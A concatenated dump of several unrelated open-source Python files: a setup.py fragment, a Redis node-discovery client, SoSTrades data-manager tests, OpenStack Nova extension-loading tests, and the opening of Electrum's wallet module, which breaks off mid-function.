classifiers=[ # Optional
# How mature is this project? Common values are
# 3 - Alpha
# 4 - Beta
# 5 - Production/Stable
'Development Status :: 4 - Beta',
# Indicate who your project is intended for
'Intended Audience :: Developers',
'Topic :: Software Development :: Build Tools',
# Pick your license as you wish
'License :: OSI Approved :: Apache Software License',
# Specify the Python versions you support here. In particular, ensure
# that you indicate whether you support Python 2, Python 3 or both.
'Programming Language :: Python :: 2',
'Programming Language :: Python :: 2.7',
'Programming Language :: Python :: 3'
],
# This field adds keywords for your project which will appear on the
# project page. What does your project relate to?
#
# Note that this is a string of words separated by whitespace, not a list.
keywords='databases development', # Optional
# You can just specify package directories manually here if your project is
# simple. Or you can use find_packages().
#
# Alternatively, if you just want to distribute a single Python file, use
# the `py_modules` argument instead as follows, which will expect a file
# called `my_module.py` to exist:
#
py_modules=["microcdt"],
# packages=find_packages(exclude=['contrib', 'docs', 'tests']), # Required
# This field lists other packages that your project depends on to run.
# Any package you put here will be installed by pip when your project is
# installed, so they must be valid existing projects.
#
# For an analysis of "install_requires" vs pip's requirements files see:
# https://packaging.python.org/en/latest/requirements.html
install_requires=['requests'], # Optional
# List additional groups of dependencies here (e.g. development
# dependencies). Users will be able to install these using the "extras"
# syntax, for example:
#
# $ pip install sampleproject[dev]
#
# Similar to `install_requires` above, these must be valid existing
# projects.
# extras_require={ # Optional
# 'dev': ['check-manifest'],
# 'test': ['coverage'],
# },
# If there are data files included in your packages that need to be
# installed, specify them here.
#
# If using Python 2.6 or earlier, then these have to be included in
# MANIFEST.in as well.
# package_data={ # Optional
# 'sample': ['package_data.dat'],
# },
# Although 'package_data' is the preferred approach, in some case you may
# need to place data files outside of your packages. See:
# http://docs.python.org/3.4/distutils/setupscript.html#installing-additional-files
#
# In this case, 'data_file' will be installed into '<sys.prefix>/my_data'
# data_files=[('my_data', ['data/data_file'])], # Optional
# To provide executable scripts, use entry points in preference to the
# "scripts" keyword. Entry points provide cross-platform support and allow
# `pip` to create the appropriate form of executable for the target
# platform.
#
# For example, the following would provide a command called `sample` which
# executes the function `main` from this package when invoked:
# entry_points={ # Optional
# 'console_scripts': [
# 'sample=sample:main',
# ],
# },
)
|
py | b4159f012997ca4c96b5aafc3e90abce36415dce | # Copyright (C) 2019 Apple Inc. All rights reserved.
#
# Redistribution and use in source and binary forms, with or without
# modification, are permitted provided that the following conditions
# are met:
# 1. Redistributions of source code must retain the above copyright
# notice, this list of conditions and the following disclaimer.
# 2. Redistributions in binary form must reproduce the above copyright
# notice, this list of conditions and the following disclaimer in the
# documentation and/or other materials provided with the distribution.
#
# THIS SOFTWARE IS PROVIDED BY APPLE INC. AND ITS CONTRIBUTORS "AS IS" AND
# ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED
# WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE
# DISCLAIMED. IN NO EVENT SHALL APPLE INC. OR ITS CONTRIBUTORS BE LIABLE FOR
# ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL
# DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR
# SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER
# CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY,
# OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE
# OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
import random
import requests
import threading
import time
from redis import StrictRedis
class CasseroleNodes(object):
DEFAULT_INTERVAL = 120 # Refresh every 2 minutes
def __init__(self, url, interval_seconds=DEFAULT_INTERVAL, asynchronous=True):
self.url = url
self.interval = interval_seconds
self._epoch = 0
self.asynchronous = asynchronous
self._nodes = []
self.retrieve_nodes()
if not self._nodes:
raise RuntimeError(f'Cannot communicate with Casserole url {self.url}')
def retrieve_nodes(self):
casserole_response = requests.get(self.url)
if casserole_response.status_code != 200:
return
self._epoch = time.time()
self._nodes = casserole_response.text.split(',')
@property
def nodes(self):
if self._epoch + self.interval > time.time():
return self._nodes
if self.asynchronous:
request_thread = threading.Thread(target=self.retrieve_nodes)
request_thread.daemon = True
request_thread.start()
else:
self.retrieve_nodes()
return self._nodes
def __len__(self):
return len(self.nodes)
def __iter__(self):
return iter(self.nodes)
class CasseroleRedis(object):
DEFAULT_INTERVAL = 120 # Refresh every 2 minutes
def __init__(
self, url, port=6379, password=None, interval_seconds=DEFAULT_INTERVAL, asynchronous=True,
ssl_keyfile=None, ssl_certfile=None, ssl_cert_reqs='required', ssl_ca_certs=None,
):
self.url = url
self.interval = interval_seconds
self.asynchronous = asynchronous
self._redis = None
self._redis_url = None
self._redis_kwargs = dict(
port=port,
password=password,
ssl_keyfile=ssl_keyfile,
ssl_certfile=ssl_certfile,
ssl_cert_reqs=ssl_cert_reqs,
ssl_ca_certs=ssl_ca_certs,
)
self._epoch = time.time()
self.connect()
def connect(self):
if self._redis and self._epoch + self.interval > time.time():
return
def do_connection(obj=self):
casserole_response = requests.get(obj.url)
if casserole_response.status_code != 200:
return
candidates = {}
for candidate in casserole_response.json():
if not candidate['isMaster']:
continue
candidates[candidate['host']] = candidate
if self._redis and self._redis_url in candidates:
# We're still connected, we don't need to do anything
return
self._redis_url = random.choice(list(candidates.keys()))
port = candidates[self._redis_url].get('sslPort')
kwargs = dict(**self._redis_kwargs)
kwargs['port'] = port or kwargs['port']
self._redis = StrictRedis(
host=self._redis_url,
ssl=True if port else False,
**kwargs
)
obj._epoch = time.time()
if self.asynchronous and self._redis:
request_thread = threading.Thread(target=do_connection)
request_thread.daemon = True
request_thread.start()
else:
do_connection()
def ping(self):
self.connect()
return self._redis.ping()
def get(self, name):
self.connect()
return self._redis.get(name)
def set(self, *args, **kwargs):
self.connect()
return self._redis.set(*args, **kwargs)
def lock(self, name, **kwargs):
self.connect()
return self._redis.lock(name, **kwargs)
def delete(self, *names):
self.connect()
return self._redis.delete(*names)
def scan_iter(self, match=None, **kwargs):
self.connect()
return self._redis.scan_iter(match=match, **kwargs)
|
py | b4159f694d16537b2b797f58b3a18b92519997e2 | '''
Copyright 2022 Airbus SAS
Licensed under the Apache License, Version 2.0 (the "License");
you may not use this file except in compliance with the License.
You may obtain a copy of the License at
http://www.apache.org/licenses/LICENSE-2.0
Unless required by applicable law or agreed to in writing, software
distributed under the License is distributed on an "AS IS" BASIS,
WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
See the License for the specific language governing permissions and
limitations under the License.
'''
'''
mode: python; py-indent-offset: 4; tab-width: 4; coding: utf-8
'''
import unittest
from sos_trades_core.execution_engine.execution_engine import ExecutionEngine
from sos_trades_core.execution_engine.sos_discipline import SoSDiscipline
class TestDataManagerStorage(unittest.TestCase):
"""
Class to test storage of data and disciplines in data manager
"""
def setUp(self):
'''
Initialize third data needed for testing
'''
self.name = 'SoSDisc'
self.ee = ExecutionEngine('Test')
self.ns_test = 'Test'
self.factory = self.ee.factory
base_path = 'sos_trades_core.sos_wrapping.test_discs'
self.mod1_path = f'{base_path}.disc1.Disc1'
self.mod2_path = f'{base_path}.disc2.Disc2'
def test_01_data_dict(self):
ns_dict = {'ns_ac': f'{self.ns_test}'}
self.ee.ns_manager.add_ns_def(ns_dict)
disc1_builder = self.factory.get_builder_from_module(
'Disc1', self.mod1_path)
disc2_builder = self.factory.get_builder_from_module(
'Disc2', self.mod2_path)
self.factory.set_builders_to_coupling_builder(
[disc1_builder, disc2_builder])
self.ee.configure()
# check data_dict and data_id_map lengths
self.assertEqual(len(self.ee.dm.data_dict),
len(self.ee.dm.data_id_map))
# check data id and full names
for var_id in self.ee.dm.data_dict.keys():
var_f_name = self.ee.dm.get_var_full_name(var_id)
self.assertEqual(self.ee.dm.get_data_id(var_f_name), var_id)
# check data_dict content
self.assertIn('Test.Disc1.a', self.ee.dm.data_id_map.keys())
self.assertIn('Test.y', self.ee.dm.data_id_map.keys())
y_dependencies_id = self.ee.dm.get_data(
'Test.y', SoSDiscipline.DISCIPLINES_DEPENDENCIES)
y_dependencies_names = [self.ee.dm.get_disc_full_name(disc_id)
for disc_id in y_dependencies_id]
self.assertListEqual(y_dependencies_names, [
'Test.Disc1', 'Test.Disc2'])
disc_id_list = self.ee.dm.get_discipline_ids_list('Test.Disc1')
# remove keys in DM
self.ee.dm.remove_keys(disc_id_list[0], ['Test.Disc1.a', 'Test.y'])
# check data_dict content after keys deletion
self.assertNotIn('Test.Disc1.a', self.ee.dm.data_id_map.keys())
self.assertIn('Test.y', self.ee.dm.data_id_map.keys())
y_dependencies_id = self.ee.dm.get_data(
'Test.y', SoSDiscipline.DISCIPLINES_DEPENDENCIES)
y_dependencies_names = [self.ee.dm.get_disc_full_name(disc_id)
for disc_id in y_dependencies_id]
self.assertListEqual(y_dependencies_names, [
'Test.Disc2'])
def test_02_disciplines_dict(self):
ns_dict = {'ns_ac': f'{self.ns_test}'}
self.ee.ns_manager.add_ns_def(ns_dict)
disc1_builder = self.factory.get_builder_from_module(
'Disc1', self.mod1_path)
disc2_builder = self.factory.get_builder_from_module(
'Disc2', self.mod2_path)
self.factory.set_builders_to_coupling_builder(
[disc1_builder, disc2_builder])
self.ee.configure()
# check disciplines_dict and disciplines_id_map lengths
self.assertEqual(len(self.ee.dm.disciplines_dict),
len(self.ee.dm.disciplines_id_map))
# check disciplines ids and full names
for disc_id in self.ee.dm.disciplines_dict:
disc_f_name = self.ee.dm.get_disc_full_name(disc_id)
self.assertEqual(
self.ee.dm.get_discipline_ids_list(disc_f_name), [disc_id])
# check disciplines_dict content after keys deletion
self.assertListEqual(list(self.ee.dm.disciplines_id_map.keys()), [
'Test', 'Test.Disc1', 'Test.Disc2'])
# remove Disc2
disc2_id = self.ee.dm.get_discipline_ids_list('Test.Disc2')[0]
self.ee.dm.clean_from_disc(disc2_id)
self.assertRaises(
KeyError, lambda: self.ee.dm.clean_from_disc(disc2_id))
# check disciplines_dict and data_dict content after discipline
# deletion
self.assertListEqual(list(self.ee.dm.disciplines_id_map.keys()), [
'Test', 'Test.Disc1'])
self.assertNotIn('Test.Disc2.constant', self.ee.dm.data_id_map)
self.assertNotIn('Test.Disc2.power', self.ee.dm.data_id_map)
self.assertNotIn('Test.z', self.ee.dm.data_id_map)
y_dependencies_id = self.ee.dm.get_data(
'Test.y', SoSDiscipline.DISCIPLINES_DEPENDENCIES)
y_dependencies_names = [self.ee.dm.get_disc_full_name(disc_id)
for disc_id in y_dependencies_id]
self.assertListEqual(y_dependencies_names, [
'Test.Disc1'])
# remove SoSCoupling Test
disc1_id = self.ee.dm.get_discipline_ids_list('Test.Disc1')[0]
self.ee.dm.clean_from_disc(disc1_id)
def test_03_execute(self):
ns_dict = {'ns_ac': f'{self.ns_test}'}
self.ee.ns_manager.add_ns_def(ns_dict)
disc1_builder = self.factory.get_builder_from_module(
'Disc1', self.mod1_path)
disc2_builder = self.factory.get_builder_from_module(
'Disc2', self.mod2_path)
self.factory.set_builders_to_coupling_builder(
[disc1_builder, disc2_builder])
self.ee.configure()
self.ee.display_treeview_nodes()
self.assertEqual(self.ee.dm.get_value('Test.x'), None)
self.ee.dm.set_data('Test.x', SoSDiscipline.VALUE, 50.0)
self.assertEqual(self.ee.dm.get_value('Test.x'), 50.0)
a = 1.0
b = 3.0
x = 99.0
values_dict = {self.ns_test + '.x': x,
self.ns_test + '.Disc1.a': a,
self.ns_test + '.Disc1.b': b,
self.ns_test + '.Disc2.constant': 1.5,
self.ns_test + '.Disc2.power': 2}
self.ee.dm.set_values_from_dict(values_dict)
self.assertEqual(self.ee.dm.get_data('Test.x', 'value'), 99.0)
self.assertEqual(self.ee.dm.get_value('Test.x'), 99.0)
self.ee.execute()
def test_04_namespace_change(self):
ns_dict = {'ns_ac': f'{self.ns_test}'}
self.ee.ns_manager.add_ns_def(ns_dict)
disc1_builder = self.factory.get_builder_from_module(
'Disc1', self.mod1_path)
disc2_builder = self.factory.get_builder_from_module(
'Disc2', self.mod2_path)
self.factory.set_builders_to_coupling_builder(
[disc1_builder, disc2_builder])
self.ee.configure()
var_id = self.ee.dm.get_data_id('Test.x')
self.assertEqual(self.ee.dm.data_id_map['Test.x'], var_id)
ns_ac = self.ee.ns_manager.ns_list[0]
ns_ac.update_value('New_ns_ac')
self.ee.dm.generate_data_id_map()
self.assertEqual(self.ee.dm.data_id_map['New_ns_ac.x'], var_id)
self.assertNotIn('Test.y', self.ee.dm.data_id_map)
self.assertIn('New_ns_ac.y', self.ee.dm.data_id_map)
self.assertNotIn('Test.z', self.ee.dm.data_id_map)
self.assertIn('New_ns_ac.z', self.ee.dm.data_id_map)
test_id = self.ee.dm.disciplines_id_map['Test'][0]
ns_test = self.ee.dm.disciplines_dict[test_id]['ns_reference']
ns_test.update_value('New_ns_test')
self.ee.dm.generate_disciplines_id_map()
self.assertEqual(
self.ee.dm.disciplines_id_map['New_ns_test'], [test_id])
self.assertNotIn('Test', self.ee.dm.disciplines_id_map)
self.assertIn('Test.sub_mda_class', self.ee.dm.data_id_map)
self.ee.dm.generate_data_id_map()
self.assertIn('New_ns_test.sub_mda_class', self.ee.dm.data_id_map)
def test_05_convert_dict_with_maps(self):
ns_dict = {'ns_ac': f'{self.ns_test}'}
self.ee.ns_manager.add_ns_def(ns_dict)
disc1_builder = self.factory.get_builder_from_module(
'Disc1', self.mod1_path)
disc2_builder = self.factory.get_builder_from_module(
'Disc2', self.mod2_path)
self.factory.set_builders_to_coupling_builder(
[disc1_builder, disc2_builder])
self.ee.configure()
self.assertDictEqual(self.ee.dm.data_dict,
self.ee.dm.convert_data_dict_with_ids(self.ee.dm.convert_data_dict_with_full_name()))
|
py | b4159fb6ba39fb209f73cf55c068f49de1607c87 | # Copyright 2013 IBM Corp.
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
from oslo.config import cfg
import stevedore
import webob.exc
from nova.api import openstack
from nova.api.openstack import compute
from nova.api.openstack.compute import plugins
from nova.api.openstack import extensions
from nova import exception
from nova import test
CONF = cfg.CONF
class fake_bad_extension(object):
name = "fake_bad_extension"
alias = "fake-bad"
class fake_stevedore_enabled_extensions(object):
def __init__(self, namespace, check_func, invoke_on_load=False,
invoke_args=(), invoke_kwds={}):
self.extensions = []
def map(self, func, *args, **kwds):
pass
def __iter__(self):
return iter(self.extensions)
class fake_loaded_extension_info(object):
def __init__(self):
self.extensions = {}
def register_extension(self, ext):
self.extensions[ext] = ext
return True
def get_extensions(self):
return {'core1': None, 'core2': None, 'noncore1': None}
class ExtensionLoadingTestCase(test.NoDBTestCase):
def _set_v3_core(self, core_extensions):
openstack.API_V3_CORE_EXTENSIONS = core_extensions
def test_extensions_loaded(self):
app = compute.APIRouterV3()
self.assertIn('servers', app._loaded_extension_info.extensions)
def test_check_bad_extension(self):
extension_info = plugins.LoadedExtensionInfo()
self.assertFalse(extension_info._check_extension(fake_bad_extension))
def test_extensions_blacklist(self):
app = compute.APIRouterV3()
self.assertIn('os-hosts', app._loaded_extension_info.extensions)
CONF.set_override('extensions_blacklist', ['os-hosts'], 'osapi_v3')
app = compute.APIRouterV3()
self.assertNotIn('os-hosts', app._loaded_extension_info.extensions)
def test_extensions_whitelist_accept(self):
# NOTE(maurosr): just to avoid to get an exception raised for not
# loading all core api.
v3_core = openstack.API_V3_CORE_EXTENSIONS
openstack.API_V3_CORE_EXTENSIONS = set(['servers'])
self.addCleanup(self._set_v3_core, v3_core)
app = compute.APIRouterV3()
self.assertIn('os-hosts', app._loaded_extension_info.extensions)
CONF.set_override('extensions_whitelist', ['servers', 'os-hosts'],
'osapi_v3')
app = compute.APIRouterV3()
self.assertIn('os-hosts', app._loaded_extension_info.extensions)
def test_extensions_whitelist_block(self):
# NOTE(maurosr): just to avoid to get an exception raised for not
# loading all core api.
v3_core = openstack.API_V3_CORE_EXTENSIONS
openstack.API_V3_CORE_EXTENSIONS = set(['servers'])
self.addCleanup(self._set_v3_core, v3_core)
app = compute.APIRouterV3()
self.assertIn('os-hosts', app._loaded_extension_info.extensions)
CONF.set_override('extensions_whitelist', ['servers'], 'osapi_v3')
app = compute.APIRouterV3()
self.assertNotIn('os-hosts', app._loaded_extension_info.extensions)
def test_blacklist_overrides_whitelist(self):
# NOTE(maurosr): just to avoid to get an exception raised for not
# loading all core api.
v3_core = openstack.API_V3_CORE_EXTENSIONS
openstack.API_V3_CORE_EXTENSIONS = set(['servers'])
self.addCleanup(self._set_v3_core, v3_core)
app = compute.APIRouterV3()
self.assertIn('os-hosts', app._loaded_extension_info.extensions)
CONF.set_override('extensions_whitelist', ['servers', 'os-hosts'],
'osapi_v3')
CONF.set_override('extensions_blacklist', ['os-hosts'], 'osapi_v3')
app = compute.APIRouterV3()
self.assertNotIn('os-hosts', app._loaded_extension_info.extensions)
self.assertIn('servers', app._loaded_extension_info.extensions)
self.assertEqual(len(app._loaded_extension_info.extensions), 1)
def test_get_missing_core_extensions(self):
v3_core = openstack.API_V3_CORE_EXTENSIONS
openstack.API_V3_CORE_EXTENSIONS = set(['core1', 'core2'])
self.addCleanup(self._set_v3_core, v3_core)
self.assertEqual(len(compute.APIRouterV3.get_missing_core_extensions(
['core1', 'core2', 'noncore1'])), 0)
missing_core = compute.APIRouterV3.get_missing_core_extensions(
['core1'])
self.assertEqual(len(missing_core), 1)
self.assertIn('core2', missing_core)
missing_core = compute.APIRouterV3.get_missing_core_extensions([])
self.assertEqual(len(missing_core), 2)
self.assertIn('core1', missing_core)
self.assertIn('core2', missing_core)
missing_core = compute.APIRouterV3.get_missing_core_extensions(
['noncore1'])
self.assertEqual(len(missing_core), 2)
self.assertIn('core1', missing_core)
self.assertIn('core2', missing_core)
def test_core_extensions_present(self):
self.stubs.Set(stevedore.enabled, 'EnabledExtensionManager',
fake_stevedore_enabled_extensions)
self.stubs.Set(plugins, 'LoadedExtensionInfo',
fake_loaded_extension_info)
v3_core = openstack.API_V3_CORE_EXTENSIONS
openstack.API_V3_CORE_EXTENSIONS = set(['core1', 'core2'])
self.addCleanup(self._set_v3_core, v3_core)
# if no core API extensions are missing then an exception will
# not be raised when creating an instance of compute.APIRouterV3
compute.APIRouterV3()
def test_core_extensions_missing(self):
self.stubs.Set(stevedore.enabled, 'EnabledExtensionManager',
fake_stevedore_enabled_extensions)
self.stubs.Set(plugins, 'LoadedExtensionInfo',
fake_loaded_extension_info)
self.assertRaises(exception.CoreAPIMissing, compute.APIRouterV3)
def test_extensions_expected_error(self):
@extensions.expected_errors(404)
def fake_func():
raise webob.exc.HTTPNotFound()
self.assertRaises(webob.exc.HTTPNotFound, fake_func)
def test_extensions_expected_error_from_list(self):
@extensions.expected_errors((404, 403))
def fake_func():
raise webob.exc.HTTPNotFound()
self.assertRaises(webob.exc.HTTPNotFound, fake_func)
def test_extensions_unexpected_error(self):
@extensions.expected_errors(404)
def fake_func():
raise webob.exc.HTTPConflict()
self.assertRaises(webob.exc.HTTPInternalServerError, fake_func)
def test_extensions_unexpected_error_from_list(self):
@extensions.expected_errors((404, 413))
def fake_func():
raise webob.exc.HTTPConflict()
self.assertRaises(webob.exc.HTTPInternalServerError, fake_func)
def test_extensions_unexpected_policy_not_authorized_error(self):
@extensions.expected_errors(404)
def fake_func():
raise exception.PolicyNotAuthorized(action="foo")
self.assertRaises(exception.PolicyNotAuthorized, fake_func)
|
py | b4159fd4494fed0bd5f84ee59c974f34d471e818 | # Electrum - lightweight Bitcoin client
# Copyright (C) 2015 Thomas Voegtlin
#
# Permission is hereby granted, free of charge, to any person
# obtaining a copy of this software and associated documentation files
# (the "Software"), to deal in the Software without restriction,
# including without limitation the rights to use, copy, modify, merge,
# publish, distribute, sublicense, and/or sell copies of the Software,
# and to permit persons to whom the Software is furnished to do so,
# subject to the following conditions:
#
# The above copyright notice and this permission notice shall be
# included in all copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND,
# EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF
# MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND
# NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS
# BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER IN AN
# ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN
# CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE
# SOFTWARE.
# Wallet classes:
# - Imported_Wallet: imported address, no keystore
# - Standard_Wallet: one keystore, P2PKH
# - Multisig_Wallet: several keystores, P2SH
import os
import threading
import random
import time
import json
import copy
import errno
import traceback
from functools import partial
from collections import defaultdict
from numbers import Number
from decimal import Decimal
import itertools
import sys
from .i18n import _
from .util import (NotEnoughFunds, PrintError, UserCancelled, profiler,
format_satoshis, format_fee_satoshis, NoDynamicFeeEstimates,
TimeoutException, WalletFileException, BitcoinException,
InvalidPassword)
from .bitcoin import *
from .version import *
from .keystore import load_keystore, Hardware_KeyStore
from .storage import multisig_type, STO_EV_PLAINTEXT, STO_EV_USER_PW, STO_EV_XPUB_PW
from . import transaction
from .transaction import Transaction
from .plugins import run_hook
from . import bitcoin
from . import coinchooser
from .synchronizer import Synchronizer
from .verifier import SPV
from . import paymentrequest
from .paymentrequest import PR_PAID, PR_UNPAID, PR_UNKNOWN, PR_EXPIRED
from .paymentrequest import InvoiceStore
from .contacts import Contacts
TX_STATUS = [
_('Unconfirmed'),
_('Unconfirmed parent'),
_('Not Verified'),
_('Local'),
]
TX_HEIGHT_LOCAL = -2
TX_HEIGHT_UNCONF_PARENT = -1
TX_HEIGHT_UNCONFIRMED = 0
def relayfee(network):
from .simple_config import FEERATE_DEFAULT_RELAY
MAX_RELAY_FEE = 50000
f = network.relay_fee if network and network.relay_fee else FEERATE_DEFAULT_RELAY
return min(f, MAX_RELAY_FEE)
def dust_threshold(network):
# Change <= dust threshold is added to the tx fee
return 182 * 3 * relayfee(network) / 1000
def append_utxos_to_inputs(inputs, network, pubkey, txin_type, imax):
if txin_type != 'p2pk':
address = bitcoin.pubkey_to_address(txin_type, pubkey)
scripthash = bitcoin.address_to_scripthash(address)
else:
script = bitcoin.public_key_to_p2pk_script(pubkey)
scripthash = bitcoin.script_to_scripthash(script)
address = '(pubkey)'
u = network.listunspent_for_scripthash(scripthash)
for item in u:
if len(inputs) >= imax:
break
item['address'] = address
item['type'] = txin_type
item['prevout_hash'] = item['tx_hash']
item['prevout_n'] = int(item['tx_pos'])
item['pubkeys'] = [pubkey]
item['x_pubkeys'] = [pubkey]
item['signatures'] = [None]
item['num_sig'] = 1
inputs.append(item)
def sweep_preparations(privkeys, network, imax=100):
def find_utxos_for_privkey(txin_type, privkey, compressed):
pubkey = ecc.ECPrivkey(privkey).get_public_key_hex(compressed=compressed)
append_utxos_to_inputs(inputs, network, pubkey, txin_type, imax)
keypairs[pubkey] = privkey, compressed
inputs = []
keypairs = {}
for sec in privkeys:
txin_type, privkey, compressed = bitcoin.deserialize_privkey(sec)
find_utxos_for_privkey(txin_type, privkey, compressed)
# do other lookups to increase support coverage
if is_minikey(sec):
# minikeys don't have a compressed byte
# we lookup both compressed and uncompressed pubkeys
find_utxos_for_privkey(txin_type, privkey, not compressed)
elif txin_type == 'p2pkh':
# WIF serialization does not distinguish p2pkh and p2pk
# we also search for pay-to-pubkey outputs
find_utxos_for_privkey('p2pk', privkey, compressed)
if not inputs:
raise Exception(_('No inputs found. (Note that inputs need to be confirmed)'))
# FIXME actually inputs need not be confirmed now, see https://github.com/kyuupichan/electrumx/issues/365
return inputs, keypairs
def sweep(privkeys, network, config, recipient, fee=None, imax=100):
inputs, keypairs = sweep_preparations(privkeys, network, imax)
total = sum(i.get('value') for i in inputs)
if fee is None:
outputs = [(TYPE_ADDRESS, recipient, total)]
tx = Transaction.from_io(inputs, outputs)
fee = config.estimate_fee(tx.estimated_size())
if total - fee < 0:
raise Exception(_('Not enough funds on address.') + '\nTotal: %d satoshis\nFee: %d'%(total, fee))
if total - fee < dust_threshold(network):
raise Exception(_('Not enough funds on address.') + '\nTotal: %d satoshis\nFee: %d\nDust Threshold: %d'%(total, fee, dust_threshold(network)))
outputs = [(TYPE_ADDRESS, recipient, total - fee)]
locktime = network.get_local_height()
tx = Transaction.from_io(inputs, outputs, locktime=locktime)
tx.BIP_LI01_sort()
tx.set_rbf(True)
tx.sign(keypairs)
return tx
class AddTransactionException(Exception):
pass
class UnrelatedTransactionException(AddTransactionException):
def __str__(self):
return _("Transaction is unrelated to this wallet.")
class CannotBumpFee(Exception): pass
class Abstract_Wallet(PrintError):
"""
Wallet classes are created to handle various address generation methods.
Completion states (watching-only, single account, no seed, etc) are handled inside classes.
"""
max_change_outputs = 3
def __init__(self, storage):
self.electrum_version = ELECTRUM_VERSION
self.storage = storage
self.network = None
# verifier (SPV) and synchronizer are started in start_threads
self.synchronizer = None
self.verifier = None
self.gap_limit_for_change = 6 # constant
# locks: if you need to take multiple ones, acquire them in the order they are defined here!
self.lock = threading.RLock()
self.transaction_lock = threading.RLock()
# saved fields
self.use_change = storage.get('use_change', True)
self.multiple_change = storage.get('multiple_change', False)
self.labels = storage.get('labels', {})
self.frozen_addresses = set(storage.get('frozen_addresses',[]))
self.history = storage.get('addr_history',{}) # address -> list(txid, height)
self.fiat_value = storage.get('fiat_value', {})
self.receive_requests = storage.get('payment_requests', {})
# Verified transactions. txid -> (height, timestamp, block_pos). Access with self.lock.
self.verified_tx = storage.get('verified_tx3', {})
# Transactions pending verification. txid -> tx_height. Access with self.lock.
self.unverified_tx = defaultdict(int)
self.load_keystore()
self.load_addresses()
self.test_addresses_sanity()
self.load_transactions()
self.load_local_history()
self.check_history()
self.load_unverified_transactions()
self.remove_local_transactions_we_dont_have()
# There is a difference between wallet.up_to_date and network.is_up_to_date().
# network.is_up_to_date() returns true when all requests have been answered and processed
# wallet.up_to_date is true when the wallet is synchronized (stronger requirement)
# Neither of them considers the verifier.
self.up_to_date = False
# save wallet type the first time
if self.storage.get('wallet_type') is None:
self.storage.put('wallet_type', self.wallet_type)
# invoices and contacts
self.invoices = InvoiceStore(self.storage)
self.contacts = Contacts(self.storage)
self.coin_price_cache = {}
def diagnostic_name(self):
return self.basename()
def __str__(self):
return self.basename()
def get_master_public_key(self):
return None
@profiler
def load_transactions(self):
# load txi, txo, tx_fees
self.txi = self.storage.get('txi', {})
for txid, d in list(self.txi.items()):
for addr, lst in d.items():
self.txi[txid][addr] = set([tuple(x) for x in lst])
self.txo = self.storage.get('txo', {})
self.tx_fees = self.storage.get('tx_fees', {})
tx_list = self.storage.get('transactions', {})
# load transactions
self.transactions = {}
for tx_hash, raw in tx_list.items():
tx = Transaction(raw)
self.transactions[tx_hash] = tx
if self.txi.get(tx_hash) is None and self.txo.get(tx_hash) is None:
self.print_error("removing unreferenced tx", tx_hash)
self.transactions.pop(tx_hash)
# load spent_outpoints
_spent_outpoints = self.storage.get('spent_outpoints', {})
self.spent_outpoints = defaultdict(dict)
for prevout_hash, d in _spent_outpoints.items():
for prevout_n_str, spending_txid in d.items():
prevout_n = int(prevout_n_str)
self.spent_outpoints[prevout_hash][prevout_n] = spending_txid
@profiler
def load_local_history(self):
self._history_local = {} # address -> set(txid)
for txid in itertools.chain(self.txi, self.txo):
self._add_tx_to_local_history(txid)
def remove_local_transactions_we_dont_have(self):
txid_set = set(self.txi) | set(self.txo)
for txid in txid_set:
tx_height = self.get_tx_height(txid)[0]
if tx_height == TX_HEIGHT_LOCAL and txid not in self.transactions:
self.remove_transaction(txid)
@profiler
def save_transactions(self, write=False):
with self.transaction_lock:
tx = {}
for k,v in self.transactions.items():
tx[k] = str(v)
self.storage.put('transactions', tx)
self.storage.put('txi', self.txi)
self.storage.put('txo', self.txo)
self.storage.put('tx_fees', self.tx_fees)
self.storage.put('addr_history', self.history)
self.storage.put('spent_outpoints', self.spent_outpoints)
if write:
self.storage.write()
def save_verified_tx(self, write=False):
with self.lock:
self.storage.put('verified_tx3', self.verified_tx)
if write:
self.storage.write()
def clear_history(self):
with self.lock:
with self.transaction_lock:
self.txi = {}
self.txo = {}
self.tx_fees = {}
self.spent_outpoints = defaultdict(dict)
self.history = {}
self.verified_tx = {}
self.transactions = {}
self.save_transactions()
@profiler
def check_history(self):
save = False
hist_addrs_mine = list(filter(lambda k: self.is_mine(k), self.history.keys()))
hist_addrs_not_mine = list(filter(lambda k: not self.is_mine(k), self.history.keys()))
for addr in hist_addrs_not_mine:
self.history.pop(addr)
save = True
for addr in hist_addrs_mine:
hist = self.history[addr]
for tx_hash, tx_height in hist:
if self.txi.get(tx_hash) or self.txo.get(tx_hash):
continue
tx = self.transactions.get(tx_hash)
if tx is not None:
self.add_transaction(tx_hash, tx, allow_unrelated=True)
save = True
if save:
self.save_transactions()
def basename(self):
return os.path.basename(self.storage.path)
def save_addresses(self):
self.storage.put('addresses', {'receiving':self.receiving_addresses, 'change':self.change_addresses})
def load_addresses(self):
d = self.storage.get('addresses', {})
if type(d) != dict: d={}
self.receiving_addresses = d.get('receiving', [])
self.change_addresses = d.get('change', [])
def test_addresses_sanity(self):
addrs = self.get_receiving_addresses()
if len(addrs) > 0:
